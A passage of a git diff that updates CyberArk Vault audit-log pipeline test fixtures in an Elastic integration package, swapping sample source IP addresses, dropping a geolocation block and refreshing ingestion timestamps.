14:17:56\",\"IsoTimestamp\":\"2021-03-10T22:17:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.052377200Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:56\",\"IsoTimestamp\":\"2021-03-10T22:17:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" } @@ -262,20 +239,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -295,7 +260,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -305,8 +270,8 @@ "iso_timestamp": "2021-03-11T17:38:27Z", "file": "root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt", "safe": "PSMRecordings", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e50\u003c/MessageID\u003e\n \u003cDesc\u003eStore File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eStore File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore File\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e50\u003c/MessageID\u003e\n \u003cDesc\u003eStore File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eStore File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore File\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Store File", "message": "Store File", "issuer": "PSMPApp_VAGRANT", @@ -320,8 +285,8 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653827400Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:27\",\"IsoTimestamp\":\"2021-03-11T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.052383700Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:27\",\"IsoTimestamp\":\"2021-03-11T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" } @@ -388,7 +353,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653829700Z", + "ingested": "2021-12-09T13:37:06.052388Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "50", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json index 4b11f1bcaf9..14ef75b4cb3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:35.778795800Z", + "ingested": "2021-12-09T13:37:06.666779900Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" @@ -110,7 +110,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:35.778809900Z", + "ingested": "2021-12-09T13:37:06.666790300Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AppProviderConf\",\"File\":\"Root\\\\main_appprovider.conf.Win64.11.04\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log index d9d8af79da4..127e5680b04 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log @@ -1,9 +1,9 @@ <5>1 2021-03-08T18:32:43Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:43","IsoTimestamp":"2021-03-08T18:32:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T18:38:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:38:21","IsoTimestamp":"2021-03-08T18:38:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"VaultInternal","File":"Root\\Operating System-WinServerLocal-components-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinServerLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"LogonDomain","Value":"COMPONENTS"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T19:20:04Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:04","IsoTimestamp":"2021-03-08T19:20:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PasswordManager","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PasswordManager_workspace","File":"Root\\Test_4","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} -<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 35.192.121.42\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} +<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 67.43.156.14\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} <5>1 2021-03-11T19:32:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:32:12\n 2021-03-11T19:32:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 127.0.0.1\n \n \n \n \n \n Delete File\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:32:12","IsoTimestamp":"2021-03-11T19:32:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"_PSMLiveSessions_1","Value":""},{"Name":"_PSMLiveSessions_2","Value":""},{"Name":"_PSMLiveSessions_3","Value":""},{"Name":"_PSMLiveSessions_4","Value":""},{"Name":"_PSMLiveSessions_5","Value":""}]}}}} -<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-35.192.121.42-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-35.192.121.42-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"35.192.121.42"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-67.43.156.14-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-67.43.156.14-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"67.43.156.14"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-11T21:06:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:50\n 2021-03-11T21:06:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSM-ASR-CYBERARK-WI\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:50","IsoTimestamp":"2021-03-11T21:06:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"10.128.0.65"},{"Name":"LogonDomain","Value":"ASR-CYBERARK-WI"}]}}}} <5>1 2021-03-14T12:10:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:10:17\n 2021-03-14T12:10:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSMAdmin\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:10:17","IsoTimestamp":"2021-03-14T12:10:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMAdmin","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMAdminConnect"},{"Name":"Address","Value":"169.254.180.25"},{"Name":"LogonDomain","Value":"VAGRANT-2012-R2"}]}}}} <5>1 2021-03-15T15:09:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:09:00\n 2021-03-15T15:09:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n partner\n Root\\Database-Oracle-10.128.0.7-adrian\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:09:00","IsoTimestamp":"2021-03-15T15:09:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-Oracle-10.128.0.7-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"Oracle"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"10.128.0.7"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json index 65245ebf786..7fc36b20c4b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json @@ -69,7 +69,7 @@ "event": { 